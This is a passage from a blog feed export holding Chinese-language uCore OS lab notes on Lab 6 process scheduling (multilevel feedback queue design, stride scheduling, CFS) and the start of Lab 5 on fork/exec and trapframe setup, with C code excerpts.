class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">trap</span><span class="params">(<span class="keyword">struct</span> trapframe *tf)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (current == <span class="literal">NULL</span>)</span><br><span class="line">        <span class="built_in">trap_dispatch</span>(tf);</span><br><span class="line">    <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">struct</span> trapframe *otf = current-&gt;tf;</span><br><span class="line">        current-&gt;tf = tf;</span><br><span class="line">  </span><br><span class="line">        <span class="type">bool</span> in_kernel = <span class="built_in">trap_in_kernel</span>(tf);</span><br><span class="line">        <span class="comment">// 执行对应的中断处理例程</span></span><br><span class="line">        <span class="built_in">trap_dispatch</span>(tf);</span><br><span class="line">        <span class="comment">// 恢复对应的trapframe</span></span><br><span class="line">        current-&gt;tf = otf;</span><br><span class="line">        <span class="comment">// 如果当前中断的是用户进程</span></span><br><span class="line">        <span class="comment">// 注意这里体现出用户进程的可抢占性</span></span><br><span class="line">        <span class="keyword">if</span> (!in_kernel) &#123;</span><br><span class="line">            <span class="keyword">if</span> (current-&gt;flags &amp; PF_EXITING)</span><br><span class="line">                <span class="built_in">do_exit</span>(-E_KILLED);</span><br><span class="line">            <span class="comment">// 如果在中断处理例程中设置need_resched为1，则在此处切换进程</span></span><br><span class="line">            <span class="keyword">if</span> (current-&gt;need_resched)</span><br><span class="line">                <span class="built_in">schedule</span>();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul></li></ul></li><li><p>请在实验报告中简要说明如何设计实现”多级反馈队列调度算法“，给出概要设计，鼓励给出详细设计</p><ul><li><p>多级反馈队列算法与时间片轮换算法类似，但又有所区别。该算法需要设置多个<code>run_queue</code>，而这些<code>run_queue</code>的<code>max_time_slice</code>需要按照优先级依次递减。</p></li><li><p>在<code>sched_init</code>函数中，程序先初始化这些<code>run_queue</code>，并依次从大到小设置<code>max_time_slice</code>。</p><blockquote><p>例如队列一的<code>max_time_slice</code>为7，队列二的<code>max_time_slice</code>为5，队列三的<code>max_time_slice</code>为3。</p></blockquote></li><li><p>而执行<code>sched_class_enqueue</code>时，先判断当前进程是否是新建立的进程。如果是，则将其添加至最高优先级（即时间片最大）的队列。如果当前进程是旧进程（即已经使用过一次或多次CPU，但进程仍然未结束），则将其添加至下一个优先级的队列，因为该进程可能是IO密集型的进程，CPU消耗相对较小。</p><blockquote><p>如果原先的队列已经是最低优先级的队列了，则重新添加至该队列。</p></blockquote></li><li><p><code>sched_class_pick_next</code>要做的事情稍微有点多。首先要确认下一次执行的该是哪条队列里的哪个进程。为便于编码，我们可以直接指定切换至队列中的<strong>第一个</strong>进程（该进程是<strong>等待执行时间</strong>最久的进程）。</p><p>但队列的选择不能那么简单，因为如果只是简单的选择执行<strong>第一个队列</strong>中的进程，则大概率会产生<strong>饥饿</strong>，即低优先级的进程长时间得不到CPU资源。所以，我们可以设置每条队列占用<strong>固定时间/固定百分比</strong>的CPU。例如在每个队列中添加一个<code>max_list_time_slice</code>属性并初始化，当该队列中的进程<strong>总运行时间</strong>超过当前进程所在队列的<code>max_list_time_slice</code>（即<strong>最大运行时间片</strong>），则CPU切换至下一个队列中的进程。</p></li></ul></li></ul><h3 id="2-练习2">2) 练习2</h3><blockquote><p>实现 Stride Scheduling 调度算法（需要编码）</p></blockquote><h4 id="a-Stride调度算法的相关介绍">a. Stride调度算法的相关介绍</h4><p>uCore的Round-Robin算法可以保证每个进程得到的CPU资源是相等的，但我们希望调度器能够更加智能的为每个进程分配合理的CPU资源，让<strong>每个进程得到的时间资源与它们的优先级成正比关系</strong>。而Stride Scheduling调度算法就是这样的一种典型而简单的算法。</p><p>其中，该算法的有如下几个特点：</p><ul><li>实现简单</li><li>可控性：可以证明Stride Scheduling对进程的调度次数正比于其优先级</li><li>确定性：在不考虑计时器事件的情况下，整个调度机制都是可预知和重现的。</li></ul><p>而该算法的基本思想如下：</p><ol><li>为每个runnable的进程设置一个当前状态stride，表示该进程当前的调度权。另外定义其对应的pass值，表示对应进程在调度后，stride 需要进行的累加值。</li><li>每次需要调度时，从当前 runnable 态的进程中选择 stride最小的进程调度。</li><li>对于获得调度的进程P，将对应的stride加上其对应的步长pass（只与进程的优先权有关系）。</li><li>在一段固定的时间之后，回到 2.步骤，重新调度当前stride最小的进程。</li></ol><blockquote><p>可以证明，如果令 P.pass = BigStride / P.priority 其中 P.priority 表示进程的优先权（大于 1），而 BigStride 表示一个预先定义的大常数，则该调度方案为每个进程分配的时间将与其优先级成正比。</p></blockquote><p>不过这里有个点需要注意一下，随着进程的执行，stride属性值会一直在增加，那么就有可能造成整数溢出。当stride溢出后，不当的比较可能会造成错误。那应该怎么做呢？</p><p>这里有一个结论：<code>STRIDE_MAX – STRIDE_MIN &lt;= PASS_MAX == BIG_STRIDE / 1</code> （注意最小的Priority为1）。所以我们只要将<code>BIG_STRIDE</code>限制在某个范围内，即可保证<strong>任意两个stride之差都会在机器整数表示的范围之内</strong>。</p><p>而又因为溢出数a减去非溢出数b的结果<strong>仍然是正确</strong>的，例如</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">uint32_t</span> a = ((<span class="type">uint32_t</span>) <span class="number">-1</span>); <span class="comment">// 此时a为uint32_t的最大值</span></span><br><span class="line"><span class="type">uint32_t</span> b = <span class="number">4</span>;</span><br><span class="line">cout &lt;&lt; b - a; <span class="comment">// 输出 5, 即 4 &gt; ((uint32_t) -1)</span></span><br></pre></td></tr></table></figure><p>所以，我们只需将<code>BIG_STRIDE</code>的值限制在一个<code>uint32_t</code>所能表示的范围(uint32_t为uCore所设置的stride值的类型)，这样就可避开stride的溢出。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">define</span> BIG_STRIDE ((uint32_t) -1)</span></span><br></pre></td></tr></table></figure><p>由于<code>Stride Scheduling</code>算法涉及到大量的查找，故我们可以使用斜堆<code>skew_heap</code>数据结构来提高算法效率。该数据结构在uCore中已提供，我们无需关注其具体细节，直接调用即可。</p><h4 id="b-具体实现">b. 具体实现</h4><ul><li><p><code>stride_init</code>简简单单的一个初始化</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">stride_init</span><span class="params">(<span class="keyword">struct</span> run_queue *rq)</span> </span>&#123;</span><br><span class="line">    <span class="built_in">list_init</span>(&amp;(rq-&gt;run_list));</span><br><span class="line">    <span class="comment">// 注意这里不要使用skew_heap_init(rq-&gt;lab6_run_pool)</span></span><br><span class="line">    rq-&gt;lab6_run_pool = <span class="literal">NULL</span>;</span><br><span class="line">    rq-&gt;proc_num = <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>需要注意的是，初始化<code>rq-&gt;lab6_run_pool</code>时请直接赋值NULL即可，而不要使用<code>skew_heap_init</code>函数，因为<code>rq-&gt;lab6_run_pool</code><strong>只是一个指针，而不是一个对象</strong>。</p></li><li><p><code>stride_enqueue</code>和<code>stride_dequeue</code>与RR算法相差不大</p><p>不过要注意的是，在插入或删除一个进程后，<strong>一定要更新<code>rq-&gt;lab6_run_pool</code>指针！</strong></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">stride_enqueue</span><span class="params">(<span class="keyword">struct</span> run_queue *rq, <span class="keyword">struct</span> proc_struct *proc)</span> </span>&#123;</span><br><span class="line">    rq-&gt;lab6_run_pool = <span class="built_in">skew_heap_insert</span>(rq-&gt;lab6_run_pool, &amp;(proc-&gt;lab6_run_pool), proc_stride_comp_f);</span><br><span class="line">    <span class="keyword">if</span> (proc-&gt;time_slice == <span class="number">0</span> || proc-&gt;time_slice &gt; rq-&gt;max_time_slice) &#123;</span><br><span class="line">        proc-&gt;time_slice = rq-&gt;max_time_slice;</span><br><span class="line">    &#125;</span><br><span class="line">    proc-&gt;rq = rq;</span><br><span class="line">    rq-&gt;proc_num ++;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">stride_dequeue</span><span class="params">(<span class="keyword">struct</span> run_queue *rq, <span class="keyword">struct</span> proc_struct *proc)</span> </span>&#123;</span><br><span class="line">    rq-&gt;lab6_run_pool = <span class="built_in">skew_heap_remove</span>(rq-&gt;lab6_run_pool, &amp;(proc-&gt;lab6_run_pool), proc_stride_comp_f);</span><br><span class="line">    rq-&gt;proc_num --;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>pick_next</code>函数中涉及到了选取最小<code>Stride</code>值的进程，以及<code>stride</code>值的更新。</p><p>由于uCore中的函数<code>proc_stride_comp_f</code>已经给出源码，结合对应斜堆代码的理解，我们可以得出：<strong>stride值最小的进程在斜堆的最顶端</strong>。所以<code>pick_next</code>函数中我们可以直接选取<code>rq-&gt;lab6_run_pool</code>所指向的进程。</p><p>而<code>stride</code>值可以直接加上<code>BIG_STRIDE / p-&gt;lab6_priority</code>来完成该值的更新。不过这里有个需要注意的地方，除法运算是不能除以0的，所以我们需要在<code>alloc_proc</code>函数中将每个进程的<code>priority</code>都初始化为1.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">proc_stride_comp_f</span><span class="params">(<span class="type">void</span> *a, <span class="type">void</span> *b)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">     <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *p = <span class="built_in">le2proc</span>(a, lab6_run_pool);</span><br><span class="line">     <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *q = <span class="built_in">le2proc</span>(b, lab6_run_pool);</span><br><span class="line">     <span class="type">int32_t</span> c = p-&gt;lab6_stride - q-&gt;lab6_stride;</span><br><span class="line">     <span class="keyword">if</span> (c &gt; <span class="number">0</span>) <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">     <span class="keyword">else</span> <span class="keyword">if</span> (c == <span class="number">0</span>) <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">     <span class="keyword">else</span> <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">static</span> <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *</span><br><span class="line"><span class="built_in">stride_pick_next</span>(<span class="keyword">struct</span> run_queue *rq) &#123;</span><br><span class="line">    <span class="type">skew_heap_entry_t</span>* she = rq-&gt;lab6_run_pool;</span><br><span class="line">    <span class="keyword">if</span> (she != <span class="literal">NULL</span>) &#123;</span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">proc_struct</span>* p = <span class="built_in">le2proc</span>(she, lab6_run_pool);</span><br><span class="line">        p-&gt;lab6_stride += BIG_STRIDE / p-&gt;lab6_priority;</span><br><span class="line">        <span class="keyword">return</span> p;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">NULL</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>stride_proc_tick</code>与RR算法一致，这里不再赘述</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">stride_proc_tick</span><span class="params">(<span class="keyword">struct</span> run_queue *rq, <span class="keyword">struct</span> proc_struct *proc)</span> </span>&#123;</span><br><span class="line">     <span class="keyword">if</span> (proc-&gt;time_slice &gt; <span class="number">0</span>) &#123;</span><br><span class="line">        proc-&gt;time_slice --;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (proc-&gt;time_slice == <span class="number">0</span>) &#123;</span><br><span class="line">        proc-&gt;need_resched = <span class="number">1</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul><h3 id="3-扩展练习">3) 扩展练习</h3><h4 id="1-Challenge-1">1. Challenge 1</h4><blockquote><p>实现Linux CFS算法</p></blockquote><p>CFS （完全公平调度器）实现的主要思想是维护为任务提供处理器时间方面的平衡（公平性）。它给每个进程设置了一个虚拟时钟vruntime。其中$vruntime = 实际运行时间 * 1024 / 进程权重$。</p><p>进程按照各自不同的速率在物理时钟节拍内前进，优先级高则权重大，其虚拟时钟比真实时钟跑得慢，但获得比较多的运行时间；CFS调度器总是选择虚拟时钟跑得慢的进程来运行，从而让每个调度实体的虚拟运行时间互相追赶，进而实现进程调度上的平衡。</p><p>CFS使用<strong>红黑树</strong>来进行快速高效的插入和删除进程。</p><blockquote><p>具体实现与Stride Scheduling类似，只是稍微有些不同。咕咕咕~</p></blockquote><p>参考链接：</p><ul><li><p><a href="https://www.cnblogs.com/tianguiyu/articles/6091378.html">linux内核分析——CFS（完全公平调度算法）</a></p></li><li><p><a href="https://www.cnblogs.com/XiaoliBoy/p/10410686.html">Linux内核CFS调度器</a></p></li></ul><h4 id="2-Challenge-2">2. Challenge 2</h4><blockquote><p>在ucore上实现尽可能多的各种基本调度算法(FIFO, SJF,…)，并设计各种测试用例，能够定量地分析出各种调度算法在各种指标上的差异，说明调度算法的适用范围。</p></blockquote><blockquote><p>这个，告辞~</p></blockquote>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;简介&quot;&gt;简介&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;这里是笔者在完成&lt;code&gt;uCore&lt;/code&gt; Lab 6时写下的一些笔记&lt;/li&gt;
&lt;li&gt;内容涉及处理机调度的一些相关实现。&lt;/li&gt;
&lt;/ul&gt;</summary>
    
    
    
    <category term="天问之路" scheme="https://kiprey.github.io/categories/%E5%A4%A9%E9%97%AE%E4%B9%8B%E8%B7%AF/"/>
    
    
    <category term="uCore" scheme="https://kiprey.github.io/tags/uCore/"/>
    
    <category term="OS" scheme="https://kiprey.github.io/tags/OS/"/>
    
  </entry>
  
  <entry>
    <title>uCore实验 - Lab5</title>
    <link href="https://kiprey.github.io/2020/08/uCore-5/"/>
    <id>https://kiprey.github.io/2020/08/uCore-5/</id>
    <published>2020-08-21T09:35:38.000Z</published>
    <updated>2025-11-24T03:59:40.153Z</updated>
    
    <content type="html"><![CDATA[<h2 id="简介">简介</h2><ul><li>这里是笔者在完成<code>uCore</code> Lab 5时写下的一些笔记</li><li>内容涉及<code>fork/exec/wait/exit</code>机制的具体实现。<span id="more"></span></li></ul><h2 id="练习解答">练习解答</h2><h3 id="0-练习0">0) 练习0</h3><p>除了将lab 1/2/3/4的代码填写至lab5以外，其他地方还有部分代码需要完善一下：</p><ul><li><p>在<code>alloc_proc</code>函数中，添加对<code>proc_struct::wait_state</code>以及<code>proc_struct::cptr/optr/yptr</code>成员的初始化。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">static</span> <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *</span><br><span class="line"><span class="built_in">alloc_proc</span>(<span class="type">void</span>) &#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *proc = <span class="built_in">kmalloc</span>(<span class="built_in">sizeof</span>(<span class="keyword">struct</span> proc_struct));</span><br><span class="line">    <span class="keyword">if</span> (proc != <span class="literal">NULL</span>) &#123;</span><br><span class="line">        <span class="comment">// .....</span></span><br><span class="line">        <span class="comment">// Lab5 code</span></span><br><span class="line">        proc-&gt;wait_state = <span class="number">0</span>;</span><br><span class="line">        proc-&gt;cptr = proc-&gt;optr = proc-&gt;yptr = <span class="literal">NULL</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> proc;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>在<code>idt_init</code>函数中，设置中断<code>T_SYSCALL</code>的触发特权级为<code>DPL_USER</code></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">idt_init</span><span class="params">(<span class="type">void</span>)</span> </span>&#123;</span><br><span class="line">     <span class="comment">// ......</span></span><br><span class="line">    <span class="comment">// Lab5 code</span></span><br><span class="line">    <span class="built_in">SETGATE</span>(idt[T_SYSCALL], <span class="number">1</span>, GD_KTEXT, __vectors[T_SYSCALL], DPL_USER);</span><br><span class="line">    <span class="comment">// ......</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>在<code>trap_dispatch</code>中，设置每100次时间中断后，当前正在执行的进程准备被调度。同时，注释掉原来的&quot;100ticks&quot;输出</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">trap_dispatch</span><span class="params">(<span class="keyword">struct</span> trapframe *tf)</span> </span>&#123;</span><br><span class="line">    <span class="type">char</span> c;</span><br><span class="line">    <span class="type">int</span> ret=<span class="number">0</span>;</span><br><span class="line">    <span class="keyword">switch</span> (tf-&gt;tf_trapno) &#123;</span><br><span class="line">    <span class="comment">// ......</span></span><br><span class="line">    <span class="keyword">case</span> IRQ_OFFSET + IRQ_TIMER:</span><br><span class="line">        ticks++;</span><br><span class="line">        <span class="keyword">if</span>(ticks % TICK_NUM == <span class="number">0</span>)&#123;</span><br><span class="line">            <span class="comment">// Lab5 Code</span></span><br><span class="line">            <span class="built_in">assert</span>(current != <span class="literal">NULL</span>);</span><br><span class="line">            current-&gt;need_resched = <span class="number">1</span>;</span><br><span class="line">            <span class="comment">//print_ticks();</span></span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">   <span class="comment">// ......</span></span><br></pre></td></tr></table></figure></li><li><p>在<code>do_fork</code>函数中，添加对当前进程等待状态的检查，以及使用<code>set_links</code>函数来设置进程之间的关系。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">do_fork</span><span class="params">(<span class="type">uint32_t</span> clone_flags, <span class="type">uintptr_t</span> stack, <span class="keyword">struct</span> trapframe *tf)</span> </span>&#123;</span><br><span class="line">    <span class="comment">// ..........</span></span><br><span class="line">    <span class="keyword">if</span> ((proc = <span class="built_in">alloc_proc</span>()) == <span class="literal">NULL</span>)</span><br><span class="line">        <span class="keyword">goto</span> fork_out;</span><br><span class="line">    proc-&gt;parent = current;</span><br><span class="line">    <span class="comment">// Lab5: 确保当前进程的wait状态为空</span></span><br><span class="line">    <span class="built_in">assert</span>(current-&gt;wait_state == <span class="number">0</span>);</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">setup_kstack</span>(proc) != <span class="number">0</span>)</span><br><span class="line">        <span class="keyword">goto</span> bad_fork_cleanup_proc;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">copy_mm</span>(clone_flags, proc) != <span class="number">0</span>)</span><br><span class="line">        <span class="keyword">goto</span> bad_fork_cleanup_kstack;</span><br><span class="line">    <span class="built_in">copy_thread</span>(proc, stack, tf);</span><br><span class="line">    <span class="type">bool</span> intr_flag;</span><br><span class="line">    <span class="built_in">local_intr_save</span>(intr_flag);</span><br><span class="line">    &#123;</span><br><span class="line">        proc-&gt;pid = <span class="built_in">get_pid</span>();</span><br><span class="line">        <span class="built_in">hash_proc</span>(proc);</span><br><span class="line">        <span class="comment">// Lab5: 设置进程间的关系</span></span><br><span class="line">        <span class="built_in">set_links</span>(proc);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">local_intr_restore</span>(intr_flag);</span><br><span class="line">    <span class="built_in">wakeup_proc</span>(proc);</span><br><span class="line">    ret = proc-&gt;pid;</span><br><span class="line">    <span class="comment">// ..........</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul><h3 id="1-练习1">1) 练习1</h3><blockquote><p><strong>加载应用程序并执行</strong></p><p><strong>do_execv</strong>函数调用load_icode（位于kern/process/proc.c中）来加载并解析一个处于内存中的ELF执行文件格式的应用程序，建立相应的用户内存空间来放置应用程序的代码段、数据段等，且要设置好proc_struct结构中的成员变量trapframe中的内容，确保在执行此进程后，能够从应用程序设定的起始执行地址开始执行。需设置正确的trapframe内容。</p></blockquote><ul><li><p>相关实现代码如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// codes in `load_icode` function</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//(6) setup trapframe for user environment</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">trapframe</span> *tf = current-&gt;tf;</span><br><span class="line"><span class="built_in">memset</span>(tf, <span class="number">0</span>, <span class="built_in">sizeof</span>(<span class="keyword">struct</span> trapframe));</span><br><span class="line"><span class="comment">/* LAB5:EXERCISE1 YOUR CODE</span></span><br><span class="line"><span class="comment"> * should set tf_cs,tf_ds,tf_es,tf_ss,tf_esp,tf_eip,tf_eflags</span></span><br><span class="line"><span class="comment"> * NOTICE: If we set trapframe correctly, then the user level process can return to USER MODE from kernel. So</span></span><br><span class="line"><span class="comment"> *          tf_cs should be USER_CS segment (see memlayout.h)</span></span><br><span class="line"><span class="comment"> *          tf_ds=tf_es=tf_ss should be USER_DS segment</span></span><br><span class="line"><span class="comment"> *          tf_esp should be the top addr of user stack (USTACKTOP)</span></span><br><span class="line"><span class="comment"> *          tf_eip should be the entry point of this binary program (elf-&gt;e_entry)</span></span><br><span class="line"><span class="comment"> *          tf_eflags should be set to enable computer to produce Interrupt</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line">tf-&gt;tf_cs = USER_CS;</span><br><span class="line">tf-&gt;tf_ds = tf-&gt;tf_es = tf-&gt;tf_ss = USER_DS;</span><br><span class="line">tf-&gt;tf_esp = USTACKTOP;</span><br><span class="line">tf-&gt;tf_eip = elf-&gt;e_entry;</span><br><span class="line">tf-&gt;tf_eflags = FL_IF;</span><br><span class="line">ret = <span class="number">0</span>;</span><br></pre></td></tr></table></figure></li><li><p>请描述当创建一个用户态进程并加载了应用程序后，CPU是如何让这个应用程序最终在用户态执行起来的。即这个用户态进程被ucore选择占用CPU执行（RUNNING态）到具体执行应用程序第一条指令的整个经过。</p><blockquote><p>为便于描述得当，笔者将介绍一个用户态程序从开始执行<code>sys_execve</code>到具体执行新加载应用程序的第一条指令这个过程。</p></blockquote><ul><li><p>当一个用户态程序执行<code>sys_execve</code>时，该程序将触发<code>0x80</code>中断，并进入中断处理例程。与Lab1类似，中断处理例程的入口代码会保存<code>trapframe</code>作为跳转回用户态的上下文环境。但与lab1代码所不同的是，lab5中的<code>trap</code>函数实现如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">trap</span><span class="params">(<span class="keyword">struct</span> trapframe *tf)</span> </span>&#123;</span><br><span class="line">    <span class="comment">// dispatch based on what type of trap occurred</span></span><br><span class="line">    <span class="comment">// used for previous projects</span></span><br><span class="line">    <span class="keyword">if</span> (current == <span class="literal">NULL</span>)</span><br><span class="line">        <span class="built_in">trap_dispatch</span>(tf);</span><br><span class="line">    <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="comment">// 因为可能会发生嵌套中断的情况，所以保存上一次的trapframe</span></span><br><span class="line">        <span class="keyword">struct</span> trapframe *otf = current-&gt;tf;</span><br><span class="line">        <span class="comment">// 注意这一步，设置当前process的栈帧为当前中断栈帧</span></span><br><span class="line">        current-&gt;tf = tf;</span><br><span class="line">        <span class="type">bool</span> in_kernel = <span class="built_in">trap_in_kernel</span>(tf);</span><br><span class="line">        <span class="built_in">trap_dispatch</span>(tf);</span><br><span class="line">        current-&gt;tf = otf;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (!in_kernel) &#123;</span><br><span class="line">            <span class="keyword">if</span> (current-&gt;flags &amp; PF_EXITING)</span><br><span class="line">                <span class="built_in">do_exit</span>(-E_KILLED);</span><br><span class="line">            <span class="keyword">if</span> (current-&gt;need_resched)</span><br><span class="line">                <span class="built_in">schedule</span>();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>由于<code>trap</code>函数的设计，在<code>do_execve</code>中，此时的<code>current-&gt;tf</code>保存的就是用户态的上下文。</p></li><li><p>因此在执行<code>load_icode</code>函数时，程序只会修改<code>current-&gt;trapframe</code>。因为当中断处理程序返回时，CPU所加载的上下文就是<code>current-&gt;trapframe</code>。</p></li></ul></li></ul><h3 id="2-练习2">2) 练习2</h3><blockquote><p><strong>父进程复制自己的内存空间给子进程</strong></p><p>创建子进程的函数do_fork在执行中将拷贝当前进程（即父进程）的用户内存地址空间中的合法内容到新进程中（子进程），完成内存资源的复制。具体是通过copy_range函数实现的，请补充copy_range的实现，确保能够正确执行。。</p></blockquote><p>实现代码如下，详细信息以注释的形式写到代码中：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span 